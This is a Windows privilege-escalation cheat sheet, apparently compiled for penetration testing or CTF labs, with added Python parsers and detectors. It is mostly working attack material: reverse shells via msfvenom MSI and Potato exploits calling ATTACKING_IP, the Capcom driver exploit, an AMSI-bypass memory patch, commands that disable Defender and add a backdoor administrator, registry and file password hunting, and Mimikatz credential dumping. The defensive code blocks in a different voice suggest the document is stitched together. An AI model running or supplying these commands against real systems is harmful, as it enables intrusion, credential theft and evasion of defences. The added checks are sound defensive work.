Windows

System enumeration

hostname
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" # /B Matches the text pattern if it is at the beginning of a line.
wmic qfe # extract patches (KB), wmic = windows management instrumentation cmd line, qfe = quick fix engineering
wmic qfe get Caption,Description,HotFixID,InstalledOn # extract patches, showing only these specific columns
wmic logicaldisk
wmic logicaldisk get caption,description,providername # check whether other drives (local or mapped) exist

Users enumeration

whoami /all
net users
net user administrator
wmic useraccount list brief # includes SID
net localgroup
net localgroup administrators

Network enumeration

ipconfig
ipconfig /all
arp -a
route print
netstat -ano
# fport supports Windows NT4, Windows 2000 and Windows XP
# fport reports all open TCP/IP and UDP ports and maps them to the owning application.
Fport.exe /p

Antivirus and Firewall enumeration

sc query windefend # sc = service control, windefend is the default windows antivirus
sc queryex type= service # list all services; look for AV products such as Sophos, Avast, ...
netsh advfirewall firewall dump # modern command, show firewall state
netsh firewall show state # old command
netsh firewall show config

Account lockout

net accounts
net accounts /domain

PowerShell Enumeration

$ExecutionContext.SessionState.LanguageMode
Get-ExecutionPolicy

Tools

  • https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
  • https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

Kernel Exploit

  • https://github.com/SecWiki/windows-kernel-exploits
  • https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py

python2 windows-exploit-suggester.py --update
python2 windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt 
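The suggester step above works by reading the OS version and the hotfix list out of systeminfo.txt and matching them against a bulletin database. The following is an added example, not code from this cheat sheet or from Windows-Exploit-Suggester: a small parser for systeminfo output plus a patch-gap check against a list of required KBs that you supply. The systeminfo text and the KB numbers are constructed placeholders, and the `required` list is an assumption of the caller (for instance the KBs your baseline mandates for that build).

```python
import re
from dataclasses import dataclass, field

# Constructed `systeminfo` output for a hypothetical host; the KB numbers are
# placeholders, not real bulletins.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WS01
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19044 N/A Build 19044
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB5000001
                           [02]: KB5000002
                           [03]: KB5000003
Network Card(s):           1 NIC(s) Installed.
                           [01]: Constructed Ethernet Adapter
"""


@dataclass
class HostInfo:
    os_name: str = ""
    os_version: str = ""
    system_type: str = ""
    hotfixes: list = field(default_factory=list)


# "Field Name:   value" lines start at column 0; continuation items are
# indented and look like "[01]: value". The item belongs to the last field seen.
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z0-9 ()/]*?):\s*(.*)$")
ITEM_RE = re.compile(r"^\s+\[\d+\]:\s*(\S.*?)\s*$")


def parse_systeminfo(text):
    """Extract OS name/version/type and the installed KB list from systeminfo output."""
    info = HostInfo()
    current = None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            current, value = m.group(1), m.group(2).strip()
            if current == "OS Name":
                info.os_name = value
            elif current == "OS Version":
                info.os_version = value
            elif current == "System Type":
                info.system_type = value
            continue
        m = ITEM_RE.match(line)
        if m and current == "Hotfix(s)":
            info.hotfixes.append(m.group(1).upper())
    return info


def build_number(info):
    """Numeric build from the 'OS Version' line, or None if it is not present."""
    m = re.search(r"Build (\d+)", info.os_version)
    return int(m.group(1)) if m else None


def missing_patches(info, required):
    """KBs from `required` that systeminfo did not list as installed (case-insensitive)."""
    installed = set(info.hotfixes)
    return [kb for kb in required if kb.upper() not in installed]


if __name__ == "__main__":
    host = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(host.os_name, host.os_version, "build", build_number(host))
    print("missing:", missing_patches(host, ["KB5000002", "KB5000004"]))
```

Run it against a real `systeminfo > systeminfo.txt` capture by reading the file instead of the constructed sample; a non-empty result from missing_patches is the same patch gap the suggester would turn into exploit candidates, which is why the defensive fix is simply to close that gap.
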

MSF
post/multi/recon/local_exploit_suggester

Password Hunting

Enumerate folders
tree /f /a # run from the Users directory
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt *.conf* # search for file contents
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* # search filename
Unattend files

dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

MSF
post/windows/gather/enum_unattend

PowerShell history
type C:\Users\theuser\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Unmounted volumes
mountvol
mkdir vol
mountvol vol \\?\Volume{uuid}\
cd vol
dir /s /a
Search registry
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # PuTTY cleartext proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
mRemoteNG
  • https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py

HiveNightmare

icacls C:\Windows\system32\config\sam
  • https://github.com/GossiTheDog/HiveNightmare
python3 secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

Stored credentials

cmdkey /list
runas /user:Administrator /savecred "net user newadmin pass /add"

WSL

where /R c:\windows wsl.exe
where /R c:\windows bash.exe
wsl whoami
./ubuntu1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'

Registry

Autorun
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
Always Install Elevated

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$VPN LPORT=443 -f msi -o rev.msi
msiexec /quiet /qn /i C:\Windows\Tasks\rev.msi
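Both the Winlogon autologon queries in the Password Hunting section and the AlwaysInstallElevated queries above produce the same `reg query` layout (a key path line, then value lines of name, type and data separated by four spaces). The following is an added example, not code from this cheat sheet: one parser for that layout, used for two audits. The autologon check reports whether a plaintext DefaultPassword is stored; the installer check returns True only when the policy value is REG_DWORD 0x1 in both HKLM and HKCU, which is the condition under which msiexec runs a package as SYSTEM for any user. The registry output is a constructed sample.

```python
import re

# Constructed sample: concatenated output of the Winlogon and Installer
# `reg query` commands from this cheat sheet, run on a hypothetical host.
SAMPLE_REG = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    kiosk
    DefaultDomainName    REG_SZ    CORP
    DefaultPassword    REG_SZ    constructed-sample-secret
    Shell    REG_SZ    explorer.exe

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""

# Same sample with the HKLM policy value switched off (first 0x1 is the HKLM one):
# a single hive set to 0x1 is not enough, so this must audit as not exploitable.
SAMPLE_REG_HKLM_OFF = SAMPLE_REG.replace("REG_DWORD    0x1", "REG_DWORD    0x0", 1)

KEY_RE = re.compile(r"^(HKEY_[A-Z_]+\\.*)$")
VALUE_RE = re.compile(r"^ {4}(\S.*?) {4}(REG_[A-Z_]+) {4}(.*)$")


def parse_reg_query(text):
    """Return {key_path: {value_name: (type, data)}} from `reg query` output."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, vtype, data = m.groups()
            keys[current][name] = (vtype, data)
    return keys


WINLOGON = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"


def autologon_findings(reg):
    """Autologon state and whether a plaintext DefaultPassword is stored in Winlogon."""
    values = next((v for k, v in reg.items() if k.lower() == WINLOGON.lower()), {})
    return {
        "autologon_enabled": values.get("AutoAdminLogon", ("", "0"))[1].strip() == "1",
        "user": values.get("DefaultUserName", ("", ""))[1],
        "plaintext_password_stored": "DefaultPassword" in values,
    }


INSTALLER_SUFFIX = r"\Software\Policies\Microsoft\Windows\Installer".lower()


def always_install_elevated(reg):
    """True only when BOTH the HKLM and HKCU policy values are REG_DWORD 0x1."""
    enabled = set()
    for path, values in reg.items():
        low = path.lower()
        if low.endswith(INSTALLER_SUFFIX):
            vtype, data = values.get("AlwaysInstallElevated", ("", "0x0"))
            if vtype == "REG_DWORD" and int(data, 16) == 1:
                enabled.add(low.split("\\", 1)[0])  # hive name
    return {"hkey_local_machine", "hkey_current_user"} <= enabled


if __name__ == "__main__":
    reg = parse_reg_query(SAMPLE_REG)
    print("autologon:", autologon_findings(reg))
    print("AlwaysInstallElevated exploitable:", always_install_elevated(reg))
    print("with HKLM off:", always_install_elevated(parse_reg_query(SAMPLE_REG_HKLM_OFF)))
```

Feed it the saved output of the reg query commands from this page (each hive's output can simply be concatenated). The fix on the defending side is the mirror image of the checks: clear DefaultPassword (or use the LSA secret instead), and set AlwaysInstallElevated to 0 in both hives.
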

Drivers

driverquery /v  # enumerate the drivers that are installed
searchsploit <driver name>
  • the driver directory is usually C:\Windows\System32\DRIVERS, but sometimes under "C:\Program Files". Each driver package ships with an .inf file that records its version.
type USBPcap.inf # get driver version

Compile C/C++ code on Windows: https://www.mingw-w64.org/

mingw-w64.bat # sets up the PATH environment variable for the gcc executable
gcc --help # check that gcc is now reachable on the PATH

Impersonation Privileges

whoami /priv
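The sections that follow (FullPowers, the Potato family, SeLoadDriver) all start from what `whoami /priv` reports. The following is an added example, not code from this cheat sheet: a parser for that output and a review function that flags the token privileges worth auditing on a service or low-privileged account, with the first entries of the table matching the techniques discussed on this page. The `whoami /priv` text is a constructed sample for a hypothetical service account.

```python
import re

# Constructed sample of `whoami /priv` output for a hypothetical service account.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
"""

# Token privileges that should be reviewed when held by a service or
# low-privileged account, with the reason each one matters.
SENSITIVE_PRIVILEGES = {
    "SeImpersonatePrivilege": "token impersonation (Potato family)",
    "SeAssignPrimaryTokenPrivilege": "token impersonation (Potato family)",
    "SeLoadDriverPrivilege": "loading a kernel driver",
    "SeShutdownPrivilege": "rebooting the host, which restarts Auto-start services",
    "SeDebugPrivilege": "admin-equivalent: opens any process",
    "SeBackupPrivilege": "admin-equivalent: reads any file regardless of ACL",
    "SeRestorePrivilege": "admin-equivalent: writes any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "admin-equivalent: takes ownership of any object",
}

# One row per privilege: name, free-text description, then Enabled/Disabled.
ROW_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return [(privilege, description, state)] from `whoami /priv` output."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.rstrip())
        if m:
            rows.append((m.group(1), m.group(2), m.group(3)))
    return rows


def review_privileges(text):
    """Flag sensitive privileges. 'Disabled' only means the privilege is not
    currently enabled in the token; the holder can enable it, so it still counts."""
    findings = []
    for name, _desc, state in parse_whoami_priv(text):
        if name in SENSITIVE_PRIVILEGES:
            findings.append({"name": name, "state": state, "why": SENSITIVE_PRIVILEGES[name]})
    return findings


if __name__ == "__main__":
    for f in review_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{f['name']:<32} {f['state']:<9} {f['why']}")
```

On the defending side the same list is the review checklist: service accounts that do not need to impersonate clients should be run without SeImpersonatePrivilege (virtual service accounts and the "Impersonate a client after authentication" user right assignment control this), and SeLoadDriverPrivilege should not be granted to non-admin accounts at all.
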
Restore Privileges
  • This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only.
  • https://github.com/itm4n/FullPowers
SeImpersonatePrivilege
  • https://jlajara.gitlab.io/Potatoes_Windows_Privesc

  • Sweet Potato to rule them all : https://github.com/CCob/SweetPotato

  • If the machine is older than Windows 10 1809 / Windows Server 2019 : https://github.com/ohpe/juicy-potato/

    • CLSIDs to test : https://github.com/ohpe/juicy-potato/tree/master/CLSID
# Always use the full path !!!
JuicyPotato.exe -t * -p C:\Windows\Tasks\nc.bat -l 1337 -c <clsid>

  • If the machine is Windows 10 1809 / Windows Server 2019 or newer : https://github.com/antonioCoco/RoguePotato

# On attacking machine
socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999

# On victim machine
.\RoguePotato.exe -r ATTACKING_IP -e "C:\Windows\Tasks\nc.exe ATTACKING_IP 1234 -e cmd.exe" -l 9999

  • https://github.com/itm4n/PrintSpoofer
PrintSpoofer64.exe -i -c cmd.exe
SeLoadDriver
  • Explanations : https://www.tarlogic.com/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
  • Walkthrough : https://0xdf.gitlab.io/2020/10/31/htb-fuse.html#priv-svc-print--system
  • Load the vulnerable driver : https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp
  • Capcom.sys, a vulnerable driver : https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
  • Exploit Capcom : https://github.com/tandasat/ExploitCapcom

Compile the files with Visual Studio (Release / x64 -> Build). Remove the include "stdafx.h" if it causes an error. Before building, modify the TCHAR CommandLine[] = TEXT("C:\Windows\system32\cmd.exe"); launched by the exploit and replace it with a reverse shell generated using msfvenom. Then load the vulnerable driver and run the exploit.

./EoPLoadDriver.exe System\CurrentControlSet\MyService C:\Users\svc-print\Capcom.sys
./ExploitCapcom.exe

Unquoted Service Paths

  • When the service path is not quoted (e.g. C:\Program files\soft\new folder\exec.exe), Windows will try to execute 'C:\Program.exe' first, then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
# find unquoted service
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

# check if running as system or admin
sc qc <service_name>

# check path
icacls <service_path>

# After creating or replacing the binary by a malicious one
# if start type is Auto, you need SeShutdownPrivilege to reboot
shutdown /r /t 0
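The findstr chain above filters the wmic output by hand; the following is an added example, not code from this cheat sheet, that does the same audit programmatically and also computes, for each unquoted path, the intermediate executables Windows would look for before the intended binary (the search order described in the bullet above: the prefix at every space, with .exe appended when that prefix has no extension). Note that wmic prints properties in alphabetical order regardless of the order given on the command line (DisplayName, Name, PathName, StartMode) and separates columns with runs of spaces, which is what the row regex relies on. The service table is a constructed sample.

```python
import re

# Constructed `wmic service get name,displayname,pathname,startmode` output
# for a hypothetical host. Column order is alphabetical, as wmic prints it.
SAMPLE_WMIC = r"""
DisplayName                 Name            PathName                                                    StartMode
Windows Update              wuauserv        C:\Windows\system32\svchost.exe -k netsvcs -p               Auto
Vuln Backup Agent           VulnBackup      C:\Program Files\Vuln Corp\Backup Agent\agent.exe           Auto
Good Agent                  GoodAgent       "C:\Program Files\Good Corp\agent.exe" --service            Auto
Disabled Thing              DisThing        C:\Program Files\Other\thing.exe                            Disabled
"""

# Columns are separated by two or more spaces; StartMode is a fixed vocabulary,
# so anchoring on it keeps paths containing single spaces intact.
ROW_RE = re.compile(
    r"^(?P<display>.*?)\s{2,}(?P<name>\S+)\s{2,}(?P<path>.*?)\s{2,}"
    r"(?P<mode>Auto|Manual|Disabled|Boot|System)\s*$"
)


def executable_part(pathname):
    """Executable portion of an unquoted command line.
    Heuristic: everything up to and including the first '.exe' token."""
    m = re.match(r"(.*?\.exe)\b", pathname, re.IGNORECASE)
    return m.group(1) if m else pathname.split(" ")[0]


def hijack_candidates(pathname):
    """Paths Windows would try before the intended binary when the service
    path is unquoted and contains spaces; empty when the path is safe."""
    if pathname.startswith('"'):
        return []
    exe = executable_part(pathname)
    if " " not in exe:
        return []
    out = []
    for i, ch in enumerate(exe):
        if ch == " ":
            prefix = exe[:i]
            last_component = prefix.rsplit("\\", 1)[-1]
            # CreateProcess appends .exe when the token has no extension
            out.append(prefix if "." in last_component else prefix + ".exe")
    return out


def find_unquoted_services(wmic_output, auto_only=False):
    """Services whose PathName yields hijack candidates, optionally only Auto-start ones."""
    findings = []
    for line in wmic_output.splitlines():
        m = ROW_RE.match(line.rstrip())
        if not m:
            continue
        cands = hijack_candidates(m["path"])
        if cands and (not auto_only or m["mode"] == "Auto"):
            findings.append({"name": m["name"], "path": m["path"],
                             "start_mode": m["mode"], "candidates": cands})
    return findings


if __name__ == "__main__":
    for f in find_unquoted_services(SAMPLE_WMIC):
        print(f["name"], f["start_mode"])
        for c in f["candidates"]:
            print("   would try:", c)
```

For each candidate the next question is the one the icacls line above asks: can a non-admin write to that directory? The remediation is to quote the ImagePath (sc config <name> binPath= "\"C:\path with spaces\exec.exe\"") and to make sure the parent directories are not writable by unprivileged users.
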

Localhost services

Chisel
  • https://github.com/jpillora/chisel

Access localhost port 8888 on victim machine from attacking machine

./chisel_1.7.7_linux_amd64 server -p 9876 --reverse  # attacking machine
./chisel_1.7.7_windows_amd64 client 10.10.14.20:9876 R:8888:127.0.0.1:8888 # victim machine

AMSI bypass

  • https://badoption.eu/blog/2023/07/15/divideconqer.html
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $Win32

$k = [Win32]
$a = "axmxsxix.xdxlxlx".Replace("x","")
$LoadLibrary = $k::LoadLibrary($a)
$b= "AxmxsxixSxcxaxnxBxuxfxfxexrx".Replace("x","")
$Address = $k::GetProcAddress($LoadLibrary, $b)
$p = 0
$k::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
$x = [System.Runtime.InteropServices.Marshal]
$x::Copy($Patch, 0, $Address, 6)
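The snippet above hides the strings "amsi.dll" and "AmsiScanBuffer" behind .Replace("x","") so that a naive string match on the script text misses them. The following is an added example, not code from this cheat sheet or from the linked blog post, written from the detection side: it folds constant .Replace() calls to recover the literals the script would build at run time and then looks for AMSI-tampering indicators in the resolved text. The two PowerShell inputs are constructed samples (the first mirrors the patching snippet above, shortened). This is a static heuristic only; in production the signal comes from PowerShell script block logging (event 4104), which records the script after such expansion.

```python
import re

# Constructed PowerShell sample that mirrors the patching snippet above
# (shortened); used only as input for the detector.
SAMPLE_SCRIPT = r'''
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
$a = "axmxsxix.xdxlxlx".Replace("x","")
$b = "AxmxsxixSxcxaxnxBxuxfxfxexrx".Replace("x","")
'''

# Benign script that also uses .Replace(), to show the check keys on the
# resolved value, not on the mere presence of string manipulation.
BENIGN_SCRIPT = 'Write-Host "hello".Replace("l","L")'

# Substrings that, once string-building is undone, point at AMSI tampering.
INDICATORS = ["amsi.dll", "amsiscanbuffer", "amsiinitialize", "amsiutils",
              "virtualprotect", "dllimport"]

# "literal".Replace("from","to") with constant arguments only.
REPLACE_RE = re.compile(r'"([^"]*)"\.Replace\("([^"]+)"\s*,\s*"([^"]*)"\)', re.IGNORECASE)


def resolve_string_replace(script):
    """Fold constant .Replace() calls until nothing changes, so chained calls
    such as "a".Replace("b","").Replace("c","") resolve to the final literal."""
    prev = None
    while prev != script:
        prev = script
        script = REPLACE_RE.sub(
            lambda m: '"' + m.group(1).replace(m.group(2), m.group(3)) + '"', script)
    return script


def amsi_tamper_indicators(script):
    """Indicators present in the script after constant folding, in INDICATORS order."""
    resolved = resolve_string_replace(script).lower()
    return [i for i in INDICATORS if i in resolved]


if __name__ == "__main__":
    print("sample :", amsi_tamper_indicators(SAMPLE_SCRIPT))
    print("benign :", amsi_tamper_indicators(BENIGN_SCRIPT))
```

Two or more indicators together (a P/Invoke import of VirtualProtect next to a resolved "amsi.dll") is the combination worth alerting on; a single hit such as DllImport is common in legitimate scripts.
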

Add admin account Windows

net user pentest Pentest1! /add
net localgroup administrators /add pentest

Add exclusions

Set-MpPreference -DisableRealTimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableScriptScanning 1
Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
Set-MpPreference -ExclusionProcess "legit.txt","powershell.exe","msbuild.exe"

Bypass UAC

  • https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/

Enable RDP from CLI

  • https://support.moonpoint.com/os/windows/software/remote-control/rdp/rdp-registry.php
net localgroup "Remote Desktop Users" /add pentest
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netstat -ano | find "3389"
netsh firewall set portopening protocol = TCP port = 3389 name = "RDP" mode = ENABLE scope = CUSTOM $LHOST
rdesktop $IP -u pentest -p Pentest1!

Admin to System

PsExec.exe -s -i cmd.exe
  • https://twitter.com/cyb3rops/status/1448208520680284164
\\live.sysinternals.com\tools\PsExec.exe -s -c cmd.exe

Mimikatz one liner

mimikatz.exe "privilege::debug" "lsadump::sam" "exit"
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
mimikatz.exe "privilege::debug" "sekurlsa::tickets" "exit"